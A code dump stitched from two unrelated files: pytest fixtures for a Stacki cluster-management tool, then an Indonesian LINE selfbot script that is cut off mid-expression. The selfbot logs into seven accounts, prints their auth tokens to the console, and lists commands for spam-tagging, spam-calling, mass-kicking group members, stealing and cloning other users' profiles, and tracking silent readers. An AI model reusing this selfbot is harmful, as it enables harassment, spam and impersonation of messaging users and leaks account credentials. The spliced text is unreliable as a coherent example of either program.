result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy interface')
_inner('backend-0-0', '0', '1', 'backend', 'eth0')
return _inner
@pytest.fixture
def add_switch():
def _inner(hostname, rack, rank, appliance, make, model):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
cmd = f'stack set host attr {hostname} attr=component.make value={make}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to set make')
cmd = f'stack set host attr {hostname} attr=component.model value={model}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to set model')
_inner('switch-0-0', '0', '0', 'switch', 'fake', 'unrl')
return _inner
@pytest.fixture
def add_appliance(host):
def _inner(name):
result = host.run(f'stack add appliance {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy appliance "{name}"')
# First use of the fixture adds appliance "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more appliances added
return _inner
@pytest.fixture
def add_box(host):
def _inner(name):
result = host.run(f'stack add box {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy box "{name}"')
# First use of the fixture adds box "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more boxes added
return _inner
@pytest.fixture
def add_cart(host):
def _inner(name):
result = host.run(f'stack add cart {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy cart "{name}"')
# First use of the fixture adds cart "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more carts added
return _inner
@pytest.fixture
def add_environment(host):
def _inner(name):
result = host.run(f'stack add environment {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy environment "{name}"')
# First use of the fixture adds environment "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more environments added
return _inner
@pytest.fixture
def add_group(host):
def _inner(name):
result = host.run(f'stack add group {name}')
if result.rc != 0:
pytest.fail(f'unable to add dummy group "{name}"')
# First use of the fixture adds group "test"
_inner('test')
# Then return the inner function, so we can call it inside the test
# to get more groups added
return _inner
@pytest.fixture
def add_network(host):
def _inner(name, address):
result = host.run(
f'stack add network {name} address={address} mask=255.255.255.0'
)
if result.rc != 0:
pytest.fail(f'unable to add dummy network "{name}"')
# First use of the fixture adds network "test"
_inner('test', '192.168.0.0')
# Then return the inner function, so we can call it inside the test
# to get more networks added
return _inner
@pytest.fixture
def set_host_interface(add_host_with_interface):
result = subprocess.run(
["stack", "list", "network", "private", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
addr = o[0]["address"]
mask = o[0]["mask"]
result = subprocess.run(
["stack", "list", "host", "a:backend", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
hostname = o[0]["host"]
result = subprocess.run(
["stack", "list", "host", "interface", "output-format=json"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
o = json.loads(result.stdout)
ip_list = []
interface = None
for line in o:
if line['host'] == hostname:
interface = line['interface']
# Make list of IP addresses
if line['ip']:
ip_list.append(line['ip'])
result = {
'hostname' : hostname,
'net_addr' : addr,
'net_mask' : mask,
'interface': interface,
'ip_list' : ip_list
}
return result
@pytest.fixture
def run_django_server():
# Run a Django server in a process
def runner():
try:
os.environ['DJANGO_SETTINGS_MODULE'] = 'stack.restapi.settings'
basehttp.run('127.0.0.1', 8000, get_wsgi_application())
except KeyboardInterrupt:
# The signal to exit
pass
process = multiprocessing.Process(target=runner)
process.daemon = True
process.start()
# Give the server a few seconds to get ready
time.sleep(2)
yield
# Tell the server it is time to clean up
os.kill(process.pid, signal.SIGINT)
process.join()
@pytest.fixture
def run_file_server():
# Run an HTTP server in a process
def runner():
try:
# Change to our test-files directory
os.chdir('/export/test-files')
# Serve them up
with HTTPServer(
('127.0.0.1', 8000),
SimpleHTTPRequestHandler
) as httpd:
httpd.serve_forever()
except KeyboardInterrupt:
# The signal to exit
pass
process = multiprocessing.Process(target=runner)
process.daemon = True
process.start()
# Give us a second to get going
time.sleep(1)
yield
# Tell the server it is time to clean up
os.kill(process.pid, signal.SIGINT)
process.join()
@pytest.fixture
def host_os(host):
if host.file('/etc/SuSE-release').exists:
return 'sles'
return 'redhat'
@pytest.fixture
def rmtree(tmpdir):
"""
This fixture lets you call rmtree(path) in a test, which simulates
deleting a directory and all its files. It actually moves the directory to
a temporary location and restores it when the test finishes.
"""
restore = []
def _inner(path):
result = subprocess.run(['mv', path, tmpdir.join(str(len(restore)))])
if result.returncode != 0:
pytest.fail(f'Unable to move {path}')
restore.append(path)
yield _inner
# For each directory to restore
for ndx, path in enumerate(restore):
# Delete any existing stuff
if os.path.exists(path):
shutil.rmtree(path)
# Move back the original data
result = subprocess.run(['mv', tmpdir.join(str(ndx)), path])
if result.returncode != 0:
pytest.fail(f'Unable to restore {path}')
@pytest.fixture
def invalid_host():
return 'invalid-{:04x}'.format(random.randint(0, 65535))
@pytest.fixture(scope="session")
def create_minimal_iso(tmpdir_factory):
"""
This fixture runs at the beginning of the testing session to build
the pallet minimal-1.0-sles12.x86_64.disk1.iso and copies it to the
/export/test-files/pallets/ folder.
All tests will share the same ISO, so don't do anything to it. At
the end of the session the ISO file is deleted.
"""
temp_dir = tmpdir_factory.mktemp("minimal", False)
# Change to the temp directory
with temp_dir.as_cwd():
# Create our pallet ISO
subprocess.run([
'stack', 'create', 'pallet',
'/export/test-files/pallets/roll-minimal.xml'
], check=True)
# Move our new ISO where the tests expect it
shutil.move(
temp_dir.join('minimal-1.0-sles12.x86_64.disk1.iso'),
'/export/test-files/pallets/minimal-1.0-sles12.x86_64.disk1.iso'
)
yield
# Clean up the ISO file
os.remove('/export/test-files/pallets/minimal-1.0-sles12.x86_64.disk1.iso')
@pytest.fixture(scope="session")
def create_blank_iso(tmpdir_factory):
"""
This fixture runs at the beginning of the testing session to build
the blank iso file (containing nothing) and copies it to the
/export/test-files/pallets/ folder.
All tests will share the same ISO, so don't do anything to it. At
the end of the session the ISO file is deleted.
"""
temp_dir = tmpdir_factory.mktemp("blank", False)
# Change to the temp directory
with temp_dir.as_cwd():
# Create our blank ISO
subprocess.run(['genisoimage', '-o', 'blank.iso', '.'], check=True)
# Move our new ISO where the tests expect it
shutil.move(
temp_dir.join('blank.iso'),
'/export/test-files/pallets/blank.iso'
)
yield
# Clean up the ISO file
os.remove('/export/test-files/pallets/blank.iso')
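# --- Illustrative sketch of how a test module would consume the fixtures above ---
# pytest only collects tests from test_*.py files, so defining this here keeps it out of the run;
# it simply shows the intended usage. The extra hostname and the JSON keys mirror the calls made
# by the fixtures in this file; the assertion targets are hypothetical.
def _example_add_host_usage(add_host, revert_database):
    # add_host has already created backend-0-0; ask for one more host
    add_host('backend-0-1', '0', '1', 'backend')
    result = subprocess.run(
        ["stack", "list", "host", "output-format=json"],
        stdout=subprocess.PIPE,
        encoding="utf-8",
        check=True
    )
    hostnames = [row["host"] for row in json.loads(result.stdout)]
    assert "backend-0-0" in hostnames
    assert "backend-0-1" in hostnames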
|
01.py
|
# -*- coding: utf-8 -*-
import linepy
from linepy import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia, html5lib
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#=============
cl = LineClient()
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
poll = LinePoll(cl)
call = LineCall(cl)
lineProfile = cl.getProfile()
lineSettings = cl.getSettings()
mid = cl.getProfile().mid
responsename1 = cl.getProfile().displayName
ki = LineClient()
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
lineProfile = ki.getProfile()
lineSettings = ki.getSettings()
Amid = ki.getProfile().mid
responsename2 = ki.getProfile().displayName
kk = LineClient()
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
lineProfile = kk.getProfile()
lineSettings = kk.getSettings()
Bmid = kk.getProfile().mid
responsename3 = kk.getProfile().displayName
kc = LineClient()
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
lineProfile = kc.getProfile()
lineSettings = kc.getSettings()
Cmid = kc.getProfile().mid
responsename4 = kc.getProfile().displayName
km = LineClient()
km.log("Auth Token : " + str(km.authToken))
channel4 = LineChannel(km)
km.log("Channel Access Token : " + str(channel4.channelAccessToken))
lineProfile = km.getProfile()
lineSettings = km.getSettings()
Dmid = km.getProfile().mid
responsename5 = km.getProfile().displayName
kb = LineClient()
kb.log("Auth Token : " + str(kb.authToken))
channel5 = LineChannel(kb)
kb.log("Channel Access Token : " + str(channel5.channelAccessToken))
lineProfile = kb.getProfile()
lineSettings = kb.getSettings()
Emid = kb.getProfile().mid
responsename6 = kb.getProfile().displayName
sw = LineClient()
sw.log("Auth Token : " + str(sw.authToken))
channel6 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel6.channelAccessToken))
lineProfile = sw.getProfile()
lineSettings = sw.getSettings()
Zmid = sw.getProfile().mid
responsename7 = sw.getProfile().displayName
print("---LOGIN SUCCES---")
creator = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
owner = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
admin = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
staff = ["ue6d8f9ef8f820fad9c65bbb5d1ec714b"]
KAC = [cl,ki,kk,kc,km,kb]
ABC = [cl,ki,kk,kc,km,kb]
Bots = [mid,Amid,Bmid,Cmid,Dmid,Zmid]
Saints = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
msg_dict = {}
msg_dict1 = {}
settings = {
"Picture":False,
"group":{},
"changeCover":False,
"changeVideo":False,
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"restartPoint": False,
"Kickallmember":False,
"userMention":{},
"timeRestart": {},
"server": {},
"simiSimi":{},
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{
"u5a0b4bb5d3a6d48aca8473326062af75": True
},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":False,
"contact":False,
"invite":False,
'autoJoin':True,
'autoAdd':False,
'autoBlock':False,
'Timeline':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":False,
"mentionKick":False,
"welcomeOn":False,
"stickerOn":False,
"Addsticker":{
"name": "",
"status":False
},
"stk":{},
"selfbot":True,
"Images":{},
"Img":{},
"Addimage":{
"name": "",
"status":False
},
"Videos":{},
"Addaudio":{
"name": "",
"status":False
},
"Addvideo":{
"name": "",
"status":False
},
"unsend":False,
"mention":"Ngintip aja nih...",
"Respontag":"Sekarang tag besok jatuh cinta... ",
"welcome":"Welcome...",
"leave":"See you next againt later...",
"comment":"Super Like by: Bot...",
"message":"Ready bots Protection \nProteCT your Groups...",
}
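# State for the read-point ("lurking") and silent-reader ("sider") features:
# which groups are being watched, who has read, and what has already been reported.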
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
imagesOpen = codecs.open("image.json","r","utf-8")
videosOpen = codecs.open("video.json","r","utf-8")
stickersOpen = codecs.open("sticker.json","r","utf-8")
audiosOpen = codecs.open("audio.json","r","utf-8")
Setmain = json.load(Setbot)
images = json.load(imagesOpen)
videos = json.load(videosOpen)
stickers = json.load(stickersOpen)
audios = json.load(audiosOpen)
mulai = time.time()
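# Maintenance helpers: the two restart functions re-exec the current interpreter via
# os.execl, and waktu()/runtime() format a duration in seconds as days/hours/minutes/seconds.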
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
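# The helpers below build LINE @-mention messages: each MENTIONEES entry carries the
# start (S) and end (E) character offsets of an "@x" placeholder in the text plus the
# mentioned user's mid (M), serialized as JSON into the message's contentMetadata.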
def mentionMembers(to, mid):
try:
arrData = ""
ginfo = cl.getGroup(to)
textx = "「 Daftar Member 」\n\n1. "
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "「✭」{}. ".format(str(no))
else:
textx += "\n「 Total {} Member 」".format(str(len(mid)))
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "「 Tukang {} Sider 」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "「 Auto Welcome 」\nHallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+" Di "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
try:
arrData = ""
textx = "「 Respon Leave 」\nBaper Ya Kak ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["leave"]
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
ki.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention2(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kk.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention3(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kc.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention4(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
km.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention5(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kb.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention6(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
sw.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log1():
    # iterate over a copy so entries can be removed while looping, and compare in
    # seconds to avoid needing a separate timedelta import
    for data in list(msg_dict1):
        if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])).total_seconds() > 86400:
            del msg_dict1[data]
def atend1():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict1, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
#delete log if pass more than 24 hours
def delete_log():
    # same 24-hour cleanup as delete_log1, but for the text/image cache
    for data in list(msg_dict):
        if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])).total_seconds() > 86400:
            del msg_dict[data]
def atend():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "• Gunakan「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Me\n" + \
"「✭」 " + key + "Mid「@」\n" + \
"「✭」 " + key + "Steal「@」\n" + \
"「✭」 " + key + "Cover「@」\n" + \
"「✭」 " + key + "Nk「@」\n" + \
"「✭」 " + key + "Kick「@」\n" + \
"「✭」 " + key + "Clone「@」\n" + \
"「✭」 " + key + "Restore\n" + \
"「✭」 " + key + "Reject\n" + \
"「✭」 " + key + "Mybot\n" + \
"「✭」 " + key + "Setting\n" + \
"「✭」 " + key + "About\n" + \
"「✭」 " + key + "Restart\n" + \
"「✭」 " + key + "Runtime\n" + \
"「✭」 " + key + "Creator\n" + \
"「✭」 " + key + "Speed/Sp\n" + \
"「✭」 " + key + "Respontime\n" + \
"「✭」 " + key + "Tagall\n" + \
"「✭」 " + key + "Joinall\n" + \
"「✭」 " + key + "Byeall\n" + \
"「✭」 " + key + "Bye me\n" + \
"「✭」 " + key + "Leave「Namagrup」\n" + \
"「✭」 " + key + "Ginfo\n" + \
"「✭」 " + key + "Open\n" + \
"「✭」 " + key + "Close\n" + \
"「✭」 " + key + "Url\n" + \
"「✭」 " + key + "Gruplist\n" + \
"「✭」 " + key + "Open「nomer」\n" + \
"「✭」 " + key + "Close「nomer」\n" + \
"「✭」 " + key + "Infogrup「nomer」\n" + \
"「✭」 " + key + "Infomem「nomer」\n" + \
"「✭」 " + key + "Joinall「nomer」\n" + \
"「✭」 " + key + "Leaveall「nomer」\n" + \
"「✭」 " + key + "Remove chat\n" + \
"「✭」 " + key + "Lurking「on/off」\n" + \
"「✭」 " + key + "Lurkers\n" + \
"「✭」 " + key + "Sider「on/off」\n" + \
"「✭」 " + key + "Updatefoto\n" + \
"「✭」 " + key + "Updategrup\n" + \
"「✭」 " + key + "Updatebot\n" + \
"「✭」 " + key + "Broadcast:「Text」\n" + \
"「✭」 " + key + "Setkey「New Key」\n" + \
"「✭」 " + key + "Mykey\n" + \
"「✭」 " + key + "Resetkey\n" + \
"\n「 Turn In Media 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Kode wilayah\n" + \
"「✭」 " + key + "Listmp3\n" + \
"「✭」 " + key + "Listvideo\n" + \
"「✭」 " + key + "Listimage\n" + \
"「✭」 " + key + "Liststicker\n" + \
"「✭」 " + key + "Addimg「Teks」\n" + \
"「✭」 " + key + "Dellimg「Teks」\n" + \
"「✭」 " + key + "Addmp3「Teks」\n" + \
"「✭」 " + key + "Dellmp3「Teks」\n" + \
"「✭」 " + key + "Addvideo「Teks」\n" + \
"「✭」 " + key + "Dellvideo「Teks」\n" + \
"「✭」 " + key + "Addsticker「Teks」\n" + \
"「✭」 " + key + "Dellsticker「Teks」\n" + \
"「✭」 " + key + "Spamtag:「jumlahnya」\n" + \
"「✭」 " + key + "Spamtag「@」\n" + \
"「✭」 " + key + "Spamcall:「jumlahnya」\n" + \
"「✭」 " + key + "Spamcall\n" + \
"「✭」 " + key + "Ytmp3:「Judul Lagu」\n" + \
"「✭」 " + key + "Ytmp4:「Judul Video」\n" + \
"「✭」 " + key + "Musik「Nama Penyanyi」\n" + \
"「✭」 " + key + "Get-fs「Query」\n" + \
"「✭」 " + key + "Get-line「ID Line」\n" + \
"「✭」 " + key + "Get-apk「Query」\n" + \
"「✭」 " + key + "Get-gif「Query」\n" + \
"「✭」 " + key + "Get-xxx「Query」\n" + \
"「✭」 " + key + "Get-anime「Query」\n" + \
"「✭」 " + key + "Get-mimpi「Query」\n" + \
"「✭」 " + key + "Get-audio「Query」\n" + \
"「✭」 " + key + "Get-mp3「Query」\n" + \
"「✭」 " + key + "Get-video「Query」\n" + \
"「✭」 " + key + "Get-bintang「Zodiak」\n" + \
"「✭」 " + key + "Get-zodiak「Zodiak」\n" + \
"「✭」 " + key + "Get-sholat「Nama Kota」\n" + \
"「✭」 " + key + "Get-cuaca「Nama Kota」\n" + \
"「✭」 " + key + "Get-lokasi「Nama Kota」\n" + \
"「✭」 " + key + "Get-lirik「Judul Lagu」\n" + \
"「✭」 " + key + "Get-instagram「User Name」\n" + \
"「✭」 " + key + "Get-date「tgl-bln-thn」\n" + \
"\n「 Setting Protection 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Notag「on/off」\n" + \
"「✭」 " + key + "Allprotect「on/off」\n" + \
"「✭」 " + key + "Protecturl「on/off」\n" + \
"「✭」 " + key + "Protectjoin「on/off」\n" + \
"「✭」 " + key + "Protectkick「on/off」\n" + \
"「✭」 " + key + "Protectinvite「on/off」\n" + \
"「✭」 " + key + "Protectcancel「on/off」\n" + \
"\n「 Setting User 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Invite「on/off」\n" + \
"「✭」 " + key + "Sticker「on/off」\n" + \
"「✭」 " + key + "Unsend「on/off」\n" + \
"「✭」 " + key + "Respontime「on/off」\n" + \
"「✭」 " + key + "Timeline「on/off」\n" + \
"「✭」 " + key + "Contact「on/off」\n" + \
"「✭」 " + key + "Autojoin「on/off」\n" + \
"「✭」 " + key + "Autoadd「on/off」\n" + \
"「✭」 " + key + "Welcome「on/off」\n" + \
"「✭」 " + key + "Autoleave「on/off」\n" + \
"「✭」 " + key + "Jointicket「on/off」\n" + \
"\n「 For Admin 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Bot:on\n" + \
"「✭」 " + key + "Bot:expell\n" + \
"「✭」 " + key + "Staff:on\n" + \
"「✭」 " + key + "Staff:expell\n" + \
"「✭」 " + key + "Admin:on\n" + \
"「✭」 " + key + "Admin:expell\n" + \
"「✭」 " + key + "Botadd「@」\n" + \
"「✭」 " + key + "Botdell「@」\n" + \
"「✭」 " + key + "Staffadd「@」\n" + \
"「✭」 " + key + "Staffdell「@」\n" + \
"「✭」 " + key + "Adminadd「@」\n" + \
"「✭」 " + key + "Admindell「@」\n" + \
"「✭」 " + key + "Refresh\n" + \
"「✭」 " + key + "Listbot\n" + \
"「✭」 " + key + "Listadmin\n" + \
"「✭」 " + key + "Listprotect\n" + \
"\nKetik「 Refresh 」jika sudah\nmenggunakan command diatas...\n"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "• Gunakan「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Blc\n" + \
"「✭」 " + key + "Ban:on\n" + \
"「✭」 " + key + "Unban:on\n" + \
"「✭」 " + key + "Ban「@」\n" + \
"「✭」 " + key + "Unban「@」\n" + \
"「✭」 " + key + "Talkban「@」\n" + \
"「✭」 " + key + "Untalkban「@」\n" + \
"「✭」 " + key + "Talkban:on\n" + \
"「✭」 " + key + "Untalkban:on\n" + \
"「✭」 " + key + "Banlist\n" + \
"「✭」 " + key + "Talkbanlist\n" + \
"「✭」 " + key + "Clearban\n" + \
"「✭」 " + key + "Refresh\n" + \
"\n「 Check Settings 」\n• Use「 " + key + " 」di depannya\n\n" + \
"「✭」 " + key + "Cek sider\n" + \
"「✭」 " + key + "Cek spam\n" + \
